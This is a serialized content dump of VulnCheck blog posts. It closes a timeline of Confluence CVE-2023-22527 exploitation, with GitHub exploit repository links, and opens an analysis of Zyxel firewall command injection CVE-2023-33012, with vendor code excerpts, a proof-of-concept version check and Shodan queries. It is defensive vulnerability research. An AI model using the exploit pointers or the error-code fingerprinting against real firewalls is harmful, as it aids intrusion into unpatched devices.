817],{"class":1375,"line":9903},[1373,77803,28875],{"class":9152},[1373,77805,22335],{"class":9155},[1373,77807,183],{"class":9152},[1373,77809,4606],{"class":1383},[1373,77811,4883],{"class":9173},[1373,77813,77814],{"class":9176},"4530fd2e7aec",[1373,77816,183],{"class":9173},[1373,77818,9062],{"class":1383},[1373,77820,77821,77823,77825,77827,77829,77831,77834,77836],{"class":1375,"line":9908},[1373,77822,28875],{"class":9152},[1373,77824,22355],{"class":9155},[1373,77826,183],{"class":9152},[1373,77828,4606],{"class":1383},[1373,77830,4883],{"class":9173},[1373,77832,77833],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4530fd2e7aec",[1373,77835,183],{"class":9173},[1373,77837,9062],{"class":1383},[1373,77839,77840,77842,77844,77846,77848,77850,77853,77855],{"class":1375,"line":9913},[1373,77841,28875],{"class":9152},[1373,77843,12998],{"class":9155},[1373,77845,183],{"class":9152},[1373,77847,4606],{"class":1383},[1373,77849,4883],
{"class":9173},[1373,77851,77852],{"class":9176},"2024-01-24T04:44:59Z",[1373,77854,183],{"class":9173},[1373,77856,9062],{"class":1383},[1373,77858,77859,77861,77863,77865,77867,77869,77871,77873],{"class":1375,"line":9932},[1373,77860,28875],{"class":9152},[1373,77862,22394],{"class":9155},[1373,77864,183],{"class":9152},[1373,77866,4606],{"class":1383},[1373,77868,4883],{"class":9173},[1373,77870,1281],{"class":9176},[1373,77872,183],{"class":9173},[1373,77874,9062],{"class":1383},[1373,77876,77877,77879,77881,77883,77885,77887,77890],{"class":1375,"line":9937},[1373,77878,28875],{"class":9152},[1373,77880,22413],{"class":9155},[1373,77882,183],{"class":9152},[1373,77884,4606],{"class":1383},[1373,77886,4883],{"class":9173},[1373,77888,77889],{"class":9176},"git@github.com:yoryio\u002FCVE-2023-22527.git",[1373,77891,19057],{"class":9173},[1373,77893,77894],{"class":1375,"line":9957},[1373,77895,28912],{"class":1383},[1373,77897,77898],{"class":1375,"line":9962},[1373,77899,9788],{"class":1383},[1373,77901,77902,77904,77906,77908,77910,77912,77915,77917],{"class":1375,"line":15955},[1373,77903,28875],{"class":9152},[1373,77905,22335],{"class":9155},[1373,77907,183],{"class":9152},[1373,77909,4606],{"class":1383},[1373,77911,4883],{"class":9173},[1373,77913,77914],{"class":9176},"d6ff5abefc7e",[1373,77916,183],{"class":9173},[1373,77918,9062],{"class":1383},[1373,77920,77921,77923,77925,77927,77929,77931,77934,77936],{"class":1375,"line":16030},[1373,77922,28875],{"class":9152},[1373,77924,22355],{"class":9155},[1373,77926,183],{"class":9152},[1373,77928,4606],{"class":1383},[1373,77930,4883],{"class":9173},[1373,77932,77933],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fd6ff5abefc7e",[1373,77935,183],{"class":9173},[1373,77937,9062],{"class":1383},[1373,77939,77940,77942,77944,77946,77948,77950,77953,77955],{"class":1375,"line":16035},[1373,77941,28875],{"class":9152},[1373,77943,12998],{"class":9155},[1373,77945,183],{"class":9152},[1373,77947,460
6],{"class":1383},[1373,77949,4883],{"class":9173},[1373,77951,77952],{"class":9176},"2024-01-22T19:02:59Z",[1373,77954,183],{"class":9173},[1373,77956,9062],{"class":1383},[1373,77958,77959,77961,77963,77965,77967,77969,77971,77973],{"class":1375,"line":16083},[1373,77960,28875],{"class":9152},[1373,77962,22394],{"class":9155},[1373,77964,183],{"class":9152},[1373,77966,4606],{"class":1383},[1373,77968,4883],{"class":9173},[1373,77970,1281],{"class":9176},[1373,77972,183],{"class":9173},[1373,77974,9062],{"class":1383},[1373,77976,77977,77979,77981,77983,77985,77987,77990],{"class":1375,"line":16098},[1373,77978,28875],{"class":9152},[1373,77980,22413],{"class":9155},[1373,77982,183],{"class":9152},[1373,77984,4606],{"class":1383},[1373,77986,4883],{"class":9173},[1373,77988,77989],{"class":9176},"git@github.com:thanhlam-attt\u002FCVE-2023-22527.git",[1373,77991,19057],{"class":9173},[1373,77993,77994],{"class":1375,"line":16103},[1373,77995,28912],{"class":1383},[1373,77997,77998],{"class":1375,"line":16147},[1373,77999,9788],{"class":1383},[1373,78001,78002,78004,78006,78008,78010,78012,78015,78017],{"class":1375,"line":16153},[1373,78003,28875],{"class":9152},[1373,78005,22335],{"class":9155},[1373,78007,183],{"class":9152},[1373,78009,4606],{"class":1383},[1373,78011,4883],{"class":9173},[1373,78013,78014],{"class":9176},"30d9851d825e",[1373,78016,183],{"class":9173},[1373,78018,9062],{"class":1383},[1373,78020,78021,78023,78025,78027,78029,78031,78034,78036],{"class":1375,"line":16164},[1373,78022,28875],{"class":9152},[1373,78024,22355],{"class":9155},[1373,78026,183],{"class":9152},[1373,78028,4606],{"class":1383},[1373,78030,4883],{"class":9173},[1373,78032,78033],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F30d9851d825e",[1373,78035,183],{"class":9173},[1373,78037,9062],{"class":1383},[1373,78039,78040,78042,78044,78046,78048,78050,78053,78055],{"class":1375,"line":16170},[1373,78041,28875],{"class":9152},[1373,78043,12998],{"class":9155},
[1373,78045,183],{"class":9152},[1373,78047,4606],{"class":1383},[1373,78049,4883],{"class":9173},[1373,78051,78052],{"class":9176},"2024-01-23T10:55:28Z",[1373,78054,183],{"class":9173},[1373,78056,9062],{"class":1383},[1373,78058,78059,78061,78063,78065,78067,78069,78071,78073],{"class":1375,"line":16187},[1373,78060,28875],{"class":9152},[1373,78062,22394],{"class":9155},[1373,78064,183],{"class":9152},[1373,78066,4606],{"class":1383},[1373,78068,4883],{"class":9173},[1373,78070,1281],{"class":9176},[1373,78072,183],{"class":9173},[1373,78074,9062],{"class":1383},[1373,78076,78077,78079,78081,78083,78085,78087,78090],{"class":1375,"line":16198},[1373,78078,28875],{"class":9152},[1373,78080,22413],{"class":9155},[1373,78082,183],{"class":9152},[1373,78084,4606],{"class":1383},[1373,78086,4883],{"class":9173},[1373,78088,78089],{"class":9176},"git@github.com:Chocapikk\u002FCVE-2023-22527.git",[1373,78091,19057],{"class":9173},[1373,78093,78094],{"class":1375,"line":16204},[1373,78095,28912],{"class":1383},[1373,78097,78098],{"class":1375,"line":16210},[1373,78099,9788],{"class":1383},[1373,78101,78102,78104,78106,78108,78110,78112,78115,78117],{"class":1375,"line":16254},[1373,78103,28875],{"class":9152},[1373,78105,22335],{"class":9155},[1373,78107,183],{"class":9152},[1373,78109,4606],{"class":1383},[1373,78111,4883],{"class":9173},[1373,78113,78114],{"class":9176},"4875746a557f",[1373,78116,183],{"class":9173},[1373,78118,9062],{"class":1383},[1373,78120,78121,78123,78125,78127,78129,78131,78134,78136],{"class":1375,"line":18499},[1373,78122,28875],{"class":9152},[1373,78124,22355],{"class":9155},[1373,78126,183],{"class":9152},[1373,78128,4606],{"class":1383},[1373,78130,4883],{"class":9173},[1373,78132,78133],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4875746a557f",[1373,78135,183],{"class":9173},[1373,78137,9062],{"class":1383},[1373,78139,78140,78142,78144,78146,78148,78150,78153,78155],{"class":1375,"line":18504},[1373,78141,28875],{"clas
s":9152},[1373,78143,12998],{"class":9155},[1373,78145,183],{"class":9152},[1373,78147,4606],{"class":1383},[1373,78149,4883],{"class":9173},[1373,78151,78152],{"class":9176},"2024-02-02T04:20:14Z",[1373,78154,183],{"class":9173},[1373,78156,9062],{"class":1383},[1373,78158,78159,78161,78163,78165,78167,78169,78171,78173],{"class":1375,"line":18517},[1373,78160,28875],{"class":9152},[1373,78162,22394],{"class":9155},[1373,78164,183],{"class":9152},[1373,78166,4606],{"class":1383},[1373,78168,4883],{"class":9173},[1373,78170,1281],{"class":9176},[1373,78172,183],{"class":9173},[1373,78174,9062],{"class":1383},[1373,78176,78177,78179,78181,78183,78185,78187,78190],{"class":1375,"line":18529},[1373,78178,28875],{"class":9152},[1373,78180,22413],{"class":9155},[1373,78182,183],{"class":9152},[1373,78184,4606],{"class":1383},[1373,78186,4883],{"class":9173},[1373,78188,78189],{"class":9176},"git@github.com:YongYe-Security\u002FCVE-2023-22527.git",[1373,78191,19057],{"class":9173},[1373,78193,78194],{"class":1375,"line":18541},[1373,78195,28912],{"class":1383},[1373,78197,78198],{"class":1375,"line":18562},[1373,78199,9788],{"class":1383},[1373,78201,78202,78204,78206,78208,78210,78212,78215,78217],{"class":1375,"line":18578},[1373,78203,28875],{"class":9152},[1373,78205,22335],{"class":9155},[1373,78207,183],{"class":9152},[1373,78209,4606],{"class":1383},[1373,78211,4883],{"class":9173},[1373,78213,78214],{"class":9176},"a3677d9bae7f",[1373,78216,183],{"class":9173},[1373,78218,9062],{"class":1383},[1373,78220,78221,78223,78225,78227,78229,78231,78234,78236],{"class":1375,"line":18583},[1373,78222,28875],{"class":9152},[1373,78224,22355],{"class":9155},[1373,78226,183],{"class":9152},[1373,78228,4606],{"class":1383},[1373,78230,4883],{"class":9173},[1373,78232,78233],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fa3677d9bae7f",[1373,78235,183],{"class":9173},[1373,78237,9062],{"class":1383},[1373,78239,78240,78242,78244,78246,78248,78250,78253,78255],{"cl
ass":1375,"line":18600},[1373,78241,28875],{"class":9152},[1373,78243,12998],{"class":9155},[1373,78245,183],{"class":9152},[1373,78247,4606],{"class":1383},[1373,78249,4883],{"class":9173},[1373,78251,78252],{"class":9176},"2024-01-23T07:10:55Z",[1373,78254,183],{"class":9173},[1373,78256,9062],{"class":1383},[1373,78258,78259,78261,78263,78265,78267,78269,78271,78273],{"class":1375,"line":18605},[1373,78260,28875],{"class":9152},[1373,78262,22394],{"class":9155},[1373,78264,183],{"class":9152},[1373,78266,4606],{"class":1383},[1373,78268,4883],{"class":9173},[1373,78270,1281],{"class":9176},[1373,78272,183],{"class":9173},[1373,78274,9062],{"class":1383},[1373,78276,78277,78279,78281,78283,78285,78287,78290],{"class":1375,"line":18630},[1373,78278,28875],{"class":9152},[1373,78280,22413],{"class":9155},[1373,78282,183],{"class":9152},[1373,78284,4606],{"class":1383},[1373,78286,4883],{"class":9173},[1373,78288,78289],{"class":9176},"git@github.com:VNCERT-CC\u002FCVE-2023-22527-confluence.git",[1373,78291,19057],{"class":9173},[1373,78293,78294],{"class":1375,"line":18651},[1373,78295,9861],{"class":1383},[1373,78297,78298],{"class":1375,"line":18674},[1373,78299,77268],{"class":1383},[61,78301,78303],{"id":78302},"a-clearer-picture-into-known-exploited-vulnerabilities","A Clearer Picture Into Known Exploited Vulnerabilities",[18,78305,78306],{},"Having gathered this exploitation information, we can assemble the timeline into a clear visualization to better understand the publicly known exploitation evidence provided in VulnCheck KEV.",[18,78308,78309],{},[68,78310],{":width":10862,"alt":76706,"src":76707},[18,78312,78313],{},"This example underscores how early visibility into exploitation, along with references to exploits, offers timely insight into known exploitation—a key value of using VulnCheck KEV.",[18,78315,78316,78317,59],{},"Gain access to VulnCheck’s KEV catalog, which includes the data shown in this example for over 1,900 known exploited 
vulnerabilities, by registering for VulnCheck Community Edition ",[47,78318,305],{"href":78319,"rel":78320},"https:\u002F\u002Fvulncheck.com",[51],[61,78322,202],{"id":201},[18,78324,73676,78325,73680],{},[47,78326,216],{"href":214,"rel":78327},[51],[2901,78329,78330],{},"",{"title":219,"searchDepth":220,"depth":220,"links":78332},[78333,78334,78335,78336,78337,78338],{"id":76710,"depth":220,"text":76711},{"id":76720,"depth":220,"text":76721},{"id":76827,"depth":220,"text":76828},{"id":77271,"depth":220,"text":77272},{"id":78302,"depth":220,"text":78303},{"id":201,"depth":220,"text":202},"2024-02-27","Using VulnCheck KEV, we explore the anatomy of an exploited CVE. 
We map publicly available exploitation evidence to Atlassian Confluence CVE-2023-22527 to create a visual timeline of exploitation.",{"slug":78342},"the-anatomy-of-an-exploited-cve","\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve",{"title":76696,"description":78340},"blog\u002Fthe-anatomy-of-an-exploited-cve",[],"cTS5gr-uOVhuSAQMBy_yINtvlLoJyv0ILckEdDC6k5U",{"id":78349,"title":58315,"articles":78350,"authors":78355,"body":78357,"date":79415,"description":79416,"extension":234,"image":7,"link":7,"meta":79417,"navigation":237,"path":79419,"seo":79420,"series":7,"stem":79421,"subtype":7,"tags":79422,"__hash__":79423},"blog\u002Fblog\u002Fzyxel-cve-2023-33012.md",[78351],{"title":78352,"source":61436,"link":78353,"date":78354},"Risky Biz News: Google addresses JIT security in Chrome 122","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-google-addresses-jit-security-in-chrome-122\u002F?ref=risky-business-news-newsletter","2024-02-23",[78356],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":78358,"toc":79407},[78359,78362,78364,78379,78403,78446,78461,78464,78469,78472,78550,78553,78558,78563,78566,78569,78572,78576,78579,78584,78591,78817,78830,78844,79029,79032,79037,79041,79044,79047,79051,79062,79065,79071,79194,79205,79211,79217,79223,79230,79236,79254,79260,79294,79303,79306,79324,79330,79341,79347,79350,79357,79374,79380,79383,79385,79388,79390,79404],[263,78360],{":list":78361,"ico":266,"title":58315},"[\"An unauthenticated command injection exploit affecting Zyxel firewalls was published in late January without an associated CVE. The vulnerability turns out to be CVE-2023-33012.\",\"The associated disclosure did not mention any caveats to exploitation, but it turns out only an uncommon configuration is affected. 
There are currently about 600 internet-facing Zyxel firewalls vulnerable to this issue (out of ~26,000).\",\"Unless the attacker takes specific measures, the exploit will only work on a target once.\",\"There is no evidence of exploitation in the wild.\"]",[61,78363,11648],{"id":11647},[18,78365,78366,78367,78372,78373,78378],{},"On January 25, 2024, SSD Secure Disclosure posted a disclosure titled ",[47,78368,78371],{"href":78369,"rel":78370},"https:\u002F\u002Fssd-disclosure.com\u002Fssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution\u002F",[51],"Zyxel VPN Series Pre-auth Remote Command Execution",". The writeup describes an unauthenticated remote command injection vulnerability affecting Zyxel VPN firewalls. That caught our attention. The Zyxel VPN series has appeared on the CISA KEV four times now, and the ",[47,78374,78377],{"href":78375,"rel":78376},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20240204213745\u002Fhttps:\u002F\u002Fssd-disclosure.com\u002Fssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution\u002F",[51],"original"," disclosure didn’t mention a CVE. We were very interested in the implied inadvertent patching and wanted to figure out if the vulnerability had been exploited in the wild.",[18,78380,78381,78382,78387,78388,78392,78393,78398,78399,78402],{},"We quickly learned from Zyxel PSIRT that this was not inadvertently patched. They assigned ",[47,78383,78386],{"href":78384,"rel":78385},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-33012",[51],"CVE-2023-33012"," in an ",[47,78389,5359],{"href":78390,"rel":78391},"https:\u002F\u002Fwww.zyxel.com\u002Fglobal\u002Fen\u002Fsupport\u002Fsecurity-advisories\u002Fzyxel-security-advisory-for-multiple-vulnerabilities-in-firewalls-and-wlan-controllers",[51]," published in July 2023. 
The advisory credits ",[47,78394,78397],{"href":78395,"rel":78396},"https:\u002F\u002Ftrapa.tw\u002F",[51],"TRAPA Security"," for discovering the vulnerability and clarifies the issue ",[295,78400,78401],{},"is not"," isolated to VPN series. They listed the following affected models:",[307,78404,78405,78414],{},[310,78406,78407],{},[313,78408,78409,78411],{},[316,78410,3584],{},[316,78412,78413],{},"Affected Versions",[336,78415,78416,78424,78432,78439],{},[313,78417,78418,78421],{},[341,78419,78420],{},"ATP",[341,78422,78423],{},"V5.10 through V5.36 Patch 2",[313,78425,78426,78429],{},[341,78427,78428],{},"USG FLEX",[341,78430,78431],{},"V5.00 through V5.36 Patch 2",[313,78433,78434,78437],{},[341,78435,78436],{},"USG FLEX 50(W) \u002F USG20(W)-VPN",[341,78438,78423],{},[313,78440,78441,78444],{},[341,78442,78443],{},"VPN",[341,78445,78431],{},[18,78447,78448,78449,78454,78455,78460],{},"The affected models list is important because it demonstrates a significantly larger target set than SSD described. Shodan earmarks about ",[47,78450,78453],{"href":78451,"rel":78452},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22VPN50%22%2C%22VPN100%22%2C%22VPN300%22%2C%22VPN1000%22+%2Bhtml%3A%22zyFunction.js%22+%2B%22Pragma%22",[51],"2,500"," internet-facing VPN series firewalls, but there are about ",[47,78456,78459],{"href":78457,"rel":78458},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22USG+FLEX%22%2C%22ATP100%22%2C%22ATP100W%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22%2C%22ATP800%22%2C%22VPN50%22%2C%22VPN100%22%2C%22VPN300%22%2C%22VPN1000%22+%2Bhtml%3A%22zyFunction.js%22+%2B%22Pragma%22",[51],"26,000"," instances of all the models combined.",[18,78462,78463],{},"Zyxel also provided a much wider affected range. Really, SSD provides two conflicting ranges. They write:",[1925,78465,78466],{},[18,78467,78468],{},"The affected models are VPN50, VPN100, VPN300, VPN500, and VPN1000. 
The affected firmware version is 5.21 thru to 5.36.",[18,78470,78471],{},"But their proof of concept checks for versions greater than or equal to 5.10:",[1354,78473,78475],{"className":11719,"code":78474,"language":11721,"meta":219,"style":219},"if not title.startswith(\"VPN\") or version == \"\" or float(version) \u003C 5.10:\n    print(\"[-] invulnerable target\")\n    return\n",[886,78476,78477,78530,78545],{"__ignoreMap":219},[1373,78478,78479,78481,78484,78487,78489,78492,78494,78496,78498,78500,78502,78504,78507,78509,78511,78513,78516,78518,78521,78523,78525,78528],{"class":1375,"line":1376},[1373,78480,4637],{"class":4636},[1373,78482,78483],{"class":1397}," not",[1373,78485,78486],{"class":4640}," title",[1373,78488,59],{"class":1383},[1373,78490,78491],{"class":11735},"startswith",[1373,78493,1384],{"class":1383},[1373,78495,183],{"class":1387},[1373,78497,78443],{"class":1391},[1373,78499,183],{"class":1387},[1373,78501,2230],{"class":1383},[1373,78503,57252],{"class":1397},[1373,78505,78506],{"class":4640}," version ",[1373,78508,15920],{"class":1397},[1373,78510,16579],{"class":1387},[1373,78512,57252],{"class":1397},[1373,78514,78515],{"class":9165}," float",[1373,78517,1384],{"class":1383},[1373,78519,78520],{"class":11735},"version",[1373,78522,2230],{"class":1383},[1373,78524,27250],{"class":1397},[1373,78526,78527],{"class":5467}," 5.10",[1373,78529,11747],{"class":1383},[1373,78531,78532,78534,78536,78538,78541,78543],{"class":1375,"line":220},[1373,78533,63893],{"class":1379},[1373,78535,1384],{"class":1383},[1373,78537,183],{"class":1387},[1373,78539,78540],{"class":1391},"[-] invulnerable target",[1373,78542,183],{"class":1387},[1373,78544,11875],{"class":1383},[1373,78546,78547],{"class":1375,"line":1266},[1373,78548,78549],{"class":4636},"    return\n",[18,78551,78552],{},"Assuming the Zyxel version range is correct, we scanned the internet for exposed Zyxel firewalls using the affected ranges. 
We found ~7,600 firewalls (or about 33% of the firewalls that responded to our version scan) using firmware versions that are affected by CVE-2023-33012.",[1925,78554,78555],{},[18,78556,78557],{},"Internet-Facing Zyxel Firewalls Using Versions Affected by CVE-2023-33012",[78559,78560],"pie-chart",{":labels":78561,":values":78562},"[\"Patched\",\"Unpatched\"]","[15190,7597]",[18,78564,78565],{},"For an offensive-minded individual, 7600 firewalls are still a decent target set, especially when a patch\u002Fadvisory had been published for six months. VulnCheck is full of offensive-minded individuals, and we just so happen to have a Zyxel USG FLEX in inventory (see previous statement about Zyxel firewalls in KEV). So, we started developing our own exploit.",[18,78567,78568],{},"But we swiftly ran into a wall.",[18,78570,78571],{},"SSD presents this vulnerability as a straightforward file upload and command injection. It is not. It both requires a special configuration and, unless the attacker knows what they are doing, can only work once.",[61,78573,78575],{"id":78574},"configuration-required","Configuration Required",[18,78577,78578],{},"The first hint that exploitation is not going to work right out of the box is from the CVE entry itself.",[1925,78580,78581],{},[18,78582,78583],{},"attacker to execute some OS commands by using a crafted GRE configuration when the cloud management mode is enabled.",[18,78585,78586,78587,78590],{},"Cloud Management Mode (SD-WAN mode) is not enabled by default. So, by default, Zyxel firewalls are not vulnerable to this issue. This can be easily verified using the vulnerable endpoint itself. 
The following is an edited (for brevity) version of ",[886,78588,78589],{},"\u002Fztp\u002Fcgi-bin\u002Fparse_config.py"," from USG FLEX 5.36.2:",[1354,78592,78594],{"className":11719,"code":78593,"language":11721,"meta":219,"style":219},"def main():\n form = cgi.FieldStorage()\n conf_str = form.getvalue(\"config\")\n   \n print(\"Status: 200 OK\")\n print(\"Content-type: text\u002Fhtml\")\n print(\"\")\n   \n if conf_str is None:\n      conf_str = ''\n else:\n     if not os.path.exists(ztpinclude.SERVER_SOCK_FILE):\n          logging.error(\"Cannot find sdwan_interface socket [%s]!\" % ztpinclude.SERVER_SOCK_FILE)\n          print(\"ParseError: 0xC0DE0005\")\n           else:\n",[886,78595,78596,78606,78623,78648,78653,78669,78684,78694,78698,78711,78721,78728,78759,78794,78810],{"__ignoreMap":219},[1373,78597,78598,78601,78603],{"class":1375,"line":1376},[1373,78599,78600],{"class":7293},"def",[1373,78602,19186],{"class":7297},[1373,78604,78605],{"class":1383},"():\n",[1373,78607,78608,78611,78613,78616,78618,78621],{"class":1375,"line":220},[1373,78609,78610],{"class":4640}," form ",[1373,78612,5417],{"class":1397},[1373,78614,78615],{"class":4640}," cgi",[1373,78617,59],{"class":1383},[1373,78619,78620],{"class":11735},"FieldStorage",[1373,78622,27326],{"class":1383},[1373,78624,78625,78628,78630,78633,78635,78638,78640,78642,78644,78646],{"class":1375,"line":1266},[1373,78626,78627],{"class":4640}," conf_str ",[1373,78629,5417],{"class":1397},[1373,78631,78632],{"class":4640}," form",[1373,78634,59],{"class":1383},[1373,78636,78637],{"class":11735},"getvalue",[1373,78639,1384],{"class":1383},[1373,78641,183],{"class":1387},[1373,78643,38112],{"class":1391},[1373,78645,183],{"class":1387},[1373,78647,11875],{"class":1383},[1373,78649,78650],{"class":1375,"line":1852},[1373,78651,78652],{"class":4640},"   \n",[1373,78654,78655,78658,78660,78662,78665,78667],{"class":1375,"line":4692},[1373,78656,78657],{"class":1379}," 
print",[1373,78659,1384],{"class":1383},[1373,78661,183],{"class":1387},[1373,78663,78664],{"class":1391},"Status: 200 OK",[1373,78666,183],{"class":1387},[1373,78668,11875],{"class":1383},[1373,78670,78671,78673,78675,78677,78680,78682],{"class":1375,"line":4724},[1373,78672,78657],{"class":1379},[1373,78674,1384],{"class":1383},[1373,78676,183],{"class":1387},[1373,78678,78679],{"class":1391},"Content-type: text\u002Fhtml",[1373,78681,183],{"class":1387},[1373,78683,11875],{"class":1383},[1373,78685,78686,78688,78690,78692],{"class":1375,"line":4756},[1373,78687,78657],{"class":1379},[1373,78689,1384],{"class":1383},[1373,78691,7083],{"class":1387},[1373,78693,11875],{"class":1383},[1373,78695,78696],{"class":1375,"line":4768},[1373,78697,78652],{"class":4640},[1373,78699,78700,78702,78704,78706,78709],{"class":1375,"line":4792},[1373,78701,7483],{"class":4636},[1373,78703,78627],{"class":4640},[1373,78705,5650],{"class":1397},[1373,78707,78708],{"class":7054}," None",[1373,78710,11747],{"class":1383},[1373,78712,78713,78716,78718],{"class":1375,"line":4798},[1373,78714,78715],{"class":4640},"      conf_str ",[1373,78717,5417],{"class":1397},[1373,78719,78720],{"class":1387}," ''\n",[1373,78722,78723,78726],{"class":1375,"line":4806},[1373,78724,78725],{"class":4636}," else",[1373,78727,11747],{"class":1383},[1373,78729,78730,78733,78735,78737,78739,78741,78743,78746,78748,78751,78753,78756],{"class":1375,"line":4817},[1373,78731,78732],{"class":4636},"     
if",[1373,78734,78483],{"class":1397},[1373,78736,63565],{"class":4640},[1373,78738,59],{"class":1383},[1373,78740,7590],{"class":63570},[1373,78742,59],{"class":1383},[1373,78744,78745],{"class":11735},"exists",[1373,78747,1384],{"class":1383},[1373,78749,78750],{"class":11735},"ztpinclude",[1373,78752,59],{"class":1383},[1373,78754,78755],{"class":37971},"SERVER_SOCK_FILE",[1373,78757,78758],{"class":1383},"):\n",[1373,78760,78761,78764,78766,78768,78770,78772,78775,78777,78780,78782,78785,78788,78790,78792],{"class":1375,"line":4825},[1373,78762,78763],{"class":4640},"          logging",[1373,78765,59],{"class":1383},[1373,78767,10265],{"class":11735},[1373,78769,1384],{"class":1383},[1373,78771,183],{"class":1387},[1373,78773,78774],{"class":1391},"Cannot find sdwan_interface socket [",[1373,78776,38048],{"class":5467},[1373,78778,78779],{"class":1391},"]!",[1373,78781,183],{"class":1387},[1373,78783,78784],{"class":1397}," %",[1373,78786,78787],{"class":11735}," ztpinclude",[1373,78789,59],{"class":1383},[1373,78791,78755],{"class":37971},[1373,78793,11875],{"class":1383},[1373,78795,78796,78799,78801,78803,78806,78808],{"class":1375,"line":4835},[1373,78797,78798],{"class":1379},"          print",[1373,78800,1384],{"class":1383},[1373,78802,183],{"class":1387},[1373,78804,78805],{"class":1391},"ParseError: 0xC0DE0005",[1373,78807,183],{"class":1387},[1373,78809,11875],{"class":1383},[1373,78811,78812,78815],{"class":1375,"line":4843},[1373,78813,78814],{"class":4636},"           else",[1373,78816,11747],{"class":1383},[18,78818,78819,78820,78823,78824,78826,78827,78829],{},"The important part is the check for ",[886,78821,78822],{},"ztpinclude.SERVER_SOCK_FILE",". If this file does not exist, the script sends the client the error code ",[886,78825,78805],{}," and then exits. This means it will never hit the vulnerable code path when that file doesn’t exist. 
",[886,78828,78822],{}," only exists when cloud management mode is enabled.",[18,78831,78832,78833,78836,78837,78839,78840,78843],{},"That begs the question, ",[1131,78834,78835],{},"“How many Zyxel firewalls using vulnerable firmware have cloud management mode enabled?”"," It turns out that is easy to determine as well. ",[886,78838,78589],{}," expects the caller to send base64 encoded content in the config parameter. If the script receives invalid base64 encoded data, then it will respond to the client with the error code ",[886,78841,78842],{},"ParseError: 0xC0DE0004",". See the code below:",[1354,78845,78847],{"className":11719,"code":78846,"language":11721,"meta":219,"style":219},"if not os.path.exists(ztpinclude.SERVER_SOCK_FILE):\n    logging.error(\"Cannot find sdwan_interface socket [%s]!\" % ztpinclude.SERVER_SOCK_FILE)\n    print(\"ParseError: 0xC0DE0005\")\nelse:\n    conf_str = urllib.unquote(conf_str)    \n    try:\n        decoded_config = base64.b64decode(conf_str)\n    except:\n        logging.error(\"invalid base64 str %s\" % conf_str)\n        print(\"ParseError: 0xC0DE0004\")\n        return\n",[886,78848,78849,78875,78906,78920,78926,78950,78956,78977,78983,79010,79024],{"__ignoreMap":219},[1373,78850,78851,78853,78855,78857,78859,78861,78863,78865,78867,78869,78871,78873],{"class":1375,"line":1376},[1373,78852,4637],{"class":4636},[1373,78854,78483],{"class":1397},[1373,78856,63565],{"class":4640},[1373,78858,59],{"class":1383},[1373,78860,7590],{"class":63570},[1373,78862,59],{"class":1383},[1373,78864,78745],{"class":11735},[1373,78866,1384],{"class":1383},[1373,78868,78750],{"class":11735},[1373,78870,59],{"class":1383},[1373,78872,78755],{"class":37971},[1373,78874,78758],{"class":1383},[1373,78876,78877,78880,78882,78884,78886,78888,78890,78892,78894,78896,78898,78900,78902,78904],{"class":1375,"line":220},[1373,78878,78879],{"class":4640},"    
logging",[1373,78881,59],{"class":1383},[1373,78883,10265],{"class":11735},[1373,78885,1384],{"class":1383},[1373,78887,183],{"class":1387},[1373,78889,78774],{"class":1391},[1373,78891,38048],{"class":5467},[1373,78893,78779],{"class":1391},[1373,78895,183],{"class":1387},[1373,78897,78784],{"class":1397},[1373,78899,78787],{"class":11735},[1373,78901,59],{"class":1383},[1373,78903,78755],{"class":37971},[1373,78905,11875],{"class":1383},[1373,78907,78908,78910,78912,78914,78916,78918],{"class":1375,"line":1266},[1373,78909,63893],{"class":1379},[1373,78911,1384],{"class":1383},[1373,78913,183],{"class":1387},[1373,78915,78805],{"class":1391},[1373,78917,183],{"class":1387},[1373,78919,11875],{"class":1383},[1373,78921,78922,78924],{"class":1375,"line":1852},[1373,78923,4762],{"class":4636},[1373,78925,11747],{"class":1383},[1373,78927,78928,78931,78933,78936,78938,78941,78943,78946,78948],{"class":1375,"line":4692},[1373,78929,78930],{"class":4640},"    conf_str ",[1373,78932,5417],{"class":1397},[1373,78934,78935],{"class":4640}," urllib",[1373,78937,59],{"class":1383},[1373,78939,78940],{"class":11735},"unquote",[1373,78942,1384],{"class":1383},[1373,78944,78945],{"class":11735},"conf_str",[1373,78947,2230],{"class":1383},[1373,78949,47181],{"class":4640},[1373,78951,78952,78954],{"class":1375,"line":4724},[1373,78953,11752],{"class":4636},[1373,78955,11747],{"class":1383},[1373,78957,78958,78961,78963,78966,78968,78971,78973,78975],{"class":1375,"line":4756},[1373,78959,78960],{"class":4640},"        decoded_config ",[1373,78962,5417],{"class":1397},[1373,78964,78965],{"class":4640}," 
base64",[1373,78967,59],{"class":1383},[1373,78969,78970],{"class":11735},"b64decode",[1373,78972,1384],{"class":1383},[1373,78974,78945],{"class":11735},[1373,78976,11875],{"class":1383},[1373,78978,78979,78981],{"class":1375,"line":4768},[1373,78980,11786],{"class":4636},[1373,78982,11747],{"class":1383},[1373,78984,78985,78988,78990,78992,78994,78996,78999,79001,79003,79005,79008],{"class":1375,"line":4792},[1373,78986,78987],{"class":4640},"        logging",[1373,78989,59],{"class":1383},[1373,78991,10265],{"class":11735},[1373,78993,1384],{"class":1383},[1373,78995,183],{"class":1387},[1373,78997,78998],{"class":1391},"invalid base64 str ",[1373,79000,38048],{"class":5467},[1373,79002,183],{"class":1387},[1373,79004,78784],{"class":1397},[1373,79006,79007],{"class":11735}," 